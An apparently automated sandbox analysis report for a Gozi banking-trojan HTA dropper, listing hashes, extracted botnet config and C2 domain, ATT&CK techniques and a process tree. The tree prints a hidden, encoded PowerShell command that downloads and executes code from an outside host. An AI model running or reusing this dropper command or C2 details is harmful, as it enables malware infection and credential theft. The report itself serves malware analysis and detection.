gozi | 818c482b0d6be6f5c9449c76d79edf4e038fe639267b2da83675e0c5b723cea7

General

Target

client_1.hta
Size

22KB
MD5

57d3eb665f1e9e6a19f278baabd49e7b
SHA1

44566a9d716e6abd0304544dd88d245fea990882
SHA256

4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d
SHA512

30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d
SSDEEP

384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	1048	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2824	sWgCOE.exe

Loads dropped DLL 2 IoCs

pid	Process
1048	powershell.exe
1048	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1048	powershell.exe
1048	powershell.exe
1048	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1048	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2444 wrote to memory of 2224	2444	mshta.exe	28
PID 2444 wrote to memory of 2224	2444	mshta.exe	28
PID 2444 wrote to memory of 2224	2444	mshta.exe	28
PID 2444 wrote to memory of 2224	2444	mshta.exe	28
PID 2224 wrote to memory of 1048	2224	cmd.exe	30
PID 2224 wrote to memory of 1048	2224	cmd.exe	30
PID 2224 wrote to memory of 1048	2224	cmd.exe	30
PID 2224 wrote to memory of 1048	2224	cmd.exe	30
PID 1048 wrote to memory of 2824	1048	powershell.exe	31
PID 1048 wrote to memory of 2824	1048	powershell.exe	31
PID 1048 wrote to memory of 2824	1048	powershell.exe	31
PID 1048 wrote to memory of 2824	1048	powershell.exe	31

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_1.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe
      "C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe"
      4⤵
      Executes dropped EXE
      PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe

Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
C:\Users\Admin\AppData\Local\Temp\sWgCOE.exe

Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
\Users\Admin\AppData\Local\Temp\sWgCOE.exe

Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
\Users\Admin\AppData\Local\Temp\sWgCOE.exe

Filesize
293KB

MD5
01435632dca9afc151eec77862bfbc2b

SHA1
9bbb4ae83131fafcd14d580810b14f48d2d30837

SHA256
2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

SHA512
61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

Download Submit
memory/1048-16-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1048-11-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1048-14-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/1048-13-0x00000000026E0000-0x0000000002720000-memory.dmp

Filesize
256KB

Download
memory/1048-12-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1048-25-0x00000000749A0000-0x0000000074F4B000-memory.dmp

Filesize
5.7MB

Download
memory/2824-27-0x0000000002460000-0x0000000002560000-memory.dmp

Filesize
1024KB

Download
memory/2824-28-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2824-29-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2824-30-0x00000000002D0000-0x00000000002DD000-memory.dmp

Filesize
52KB

Download
memory/2824-33-0x0000000002460000-0x0000000002560000-memory.dmp

Filesize
1024KB

Download
memory/2824-34-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads